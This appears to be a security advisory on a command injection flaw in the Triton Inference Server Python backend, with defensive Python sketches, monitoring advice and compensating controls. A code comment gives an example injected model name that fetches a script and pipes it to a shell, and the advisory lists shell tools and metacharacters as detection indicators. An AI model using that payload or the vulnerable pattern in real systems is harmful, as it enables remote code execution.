CVE-2025-23316

NVIDIA · NVIDIA Triton Inference Server for Windows and Linux (Python Backend)

Executive summary

A critical vulnerability has been identified in the NVIDIA Triton Inference Server for both Windows and Linux, specifically within its Python backend. This flaw allows a remote, unauthenticated attacker to execute arbitrary code on the server by sending a specially crafted request, potentially leading to a complete system compromise and theft of sensitive data or AI models.

Vulnerability

The vulnerability exists within the Python backend component of the NVIDIA Triton Inference Server. The server fails to properly sanitize the model name parameter in incoming requests. A remote, unauthenticated attacker can exploit this by crafting a request with a malicious model name string that includes arbitrary commands. When the server processes this request, the unsanitized input is executed on the underlying operating system with the privileges of the Triton server process, resulting in remote code execution (RCE).
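To make the injection class concrete, the sketch below contrasts the vulnerable pattern described above with a hardened equivalent. This is a hypothetical illustration of unsanitized-input command injection, not Triton's actual backend code; the `model_loader` command, the allowlist pattern, and the 64-character limit are all assumptions for the example.

```python
import re
import subprocess

# Hypothetical illustration of the vulnerability class -- NOT Triton's
# actual code. Interpolating an untrusted model name into a shell command
# lets a payload such as "resnet; curl evil.sh | sh" execute on the host.
def load_model_unsafe(model_name: str) -> None:
    subprocess.run(f"model_loader --name {model_name}", shell=True)  # command injection

# Hardened variant: validate against a strict character allowlist and
# avoid the shell entirely by passing an argument vector.
MODEL_NAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")  # assumed policy

def load_model_safe(model_name: str) -> None:
    if not MODEL_NAME_RE.fullmatch(model_name):
        raise ValueError(f"rejected model name: {model_name!r}")
    # Argument-vector form: the name is passed as data, never parsed by a shell.
    subprocess.run(["model_loader", "--name", model_name], shell=False, check=True)
```

The key design point is that validation alone is defense in depth; the structural fix is never handing attacker-influenced strings to a shell.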

Business impact

This vulnerability is rated as critical with a CVSS score of 9.8, posing a severe risk to the organization. A successful exploit could lead to a complete compromise of the affected inference server, allowing an attacker to execute arbitrary code. This could result in the theft of proprietary machine learning models and sensitive training data, disruption of critical AI-powered services, and the potential for the attacker to pivot and move laterally within the corporate network. The business could face significant financial losses, reputational damage, and loss of intellectual property.

Remediation

Immediate Action: Update NVIDIA Triton Inference Server for Windows and Linux to the patched release specified in NVIDIA's security bulletin. Monitor for exploitation attempts and review server access logs.

Proactive Monitoring:

  • Log Analysis: Review Triton Inference Server access logs for unusual or excessively long model name parameters, especially those containing special characters, shell commands, or script syntax.
  • Process Monitoring: Monitor for unexpected child processes being spawned by the Triton server process (e.g., sh, bash, powershell.exe, cmd.exe).
  • Network Traffic: Monitor for anomalous outbound network connections from the Triton server to unknown or untrusted IP addresses, which could indicate a successful compromise and command-and-control communication.
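The log-analysis step above can be sketched as a simple scanner for suspicious model-name parameters. The heuristics (shell metacharacters, command substitution, path traversal, implausible length) and the `/v2/models/<name>` path pattern from Triton's KServe-style HTTP API are assumptions to adapt to the local log format.

```python
import re
from urllib.parse import unquote

# Heuristic indicators of command-injection attempts in a model-name field.
# Patterns and the length threshold are illustrative assumptions, not a
# complete detection rule set.
SUSPICIOUS = re.compile(r"[;&|`$<>]|\$\(|\.\./")
MAX_NAME_LEN = 128

def is_suspicious_model_name(name: str) -> bool:
    return len(name) > MAX_NAME_LEN or bool(SUSPICIOUS.search(name))

def scan_log_lines(lines):
    """Yield access-log lines whose model-name parameter looks anomalous.

    Assumes entries contain '/v2/models/<name>' style request paths, as in
    Triton's HTTP inference API; names are percent-decoded before checking.
    """
    path_re = re.compile(r"/v2/models/([^/\s]+)")
    for line in lines:
        m = path_re.search(line)
        if m and is_suspicious_model_name(unquote(m.group(1))):
            yield line
```

A hit from this scanner is a triage signal, not proof of compromise; correlate with the process- and network-monitoring indicators above.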

Compensating Controls:

  • Network Segmentation: Restrict network access to the Triton Inference Server. Use a firewall or network access control lists (ACLs) to ensure it is only accessible from trusted application servers and internal IP ranges.
  • Web Application Firewall (WAF): If the server is exposed, deploy a WAF with rules designed to inspect and block malicious patterns or command injection attempts within the model name parameter of API requests.
  • Principle of Least Privilege: Ensure the Triton server process runs as a low-privilege service account with minimal necessary permissions on the host system to limit the impact of a potential compromise.
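The WAF-style control above can be approximated at a reverse proxy with an allowlist filter on the model-name path segment. The sketch below is a minimal illustration, assuming Triton's `/v2/models/<name>/...` HTTP endpoint layout; the `ALLOWED_MODELS` set and the character policy are hypothetical placeholders for locally deployed model names.

```python
import re
from urllib.parse import unquote

# Sketch of a request filter for a reverse proxy in front of Triton, as a
# compensating control. Replace ALLOWED_MODELS with the models actually
# deployed; the strict character policy is an assumed baseline.
ALLOWED_MODELS = {"resnet50", "bert_base", "densenet_onnx"}  # hypothetical
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")
MODEL_PATH = re.compile(r"^/v2/models/([^/]+)(/.*)?$")

def should_block(request_path: str) -> bool:
    """Return True for model-endpoint requests whose name is malformed or
    not on the allowlist; non-model endpoints pass through this rule."""
    m = MODEL_PATH.match(request_path)
    if not m:
        return False  # e.g. health or metrics endpoints; out of scope here
    name = unquote(m.group(1))  # decode before validating
    return not (SAFE_NAME.fullmatch(name) and name in ALLOWED_MODELS)
```

An explicit allowlist is preferable to a denylist of bad characters: it fails closed when an attacker finds an encoding or metacharacter the denylist missed.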

Exploitation status

Public Exploit Available: No

Analyst recommendation

Given the critical severity (CVSS 9.8) of this remote code execution vulnerability, immediate action is required. Organizations using the affected NVIDIA Triton Inference Server versions should prioritize applying the vendor-supplied patches to all vulnerable systems without delay. Although this vulnerability is not currently listed on the CISA KEV catalog, its high potential for impact makes it an attractive target for threat actors. If immediate patching is not feasible, implement the recommended compensating controls and proactive monitoring to reduce the risk of compromise.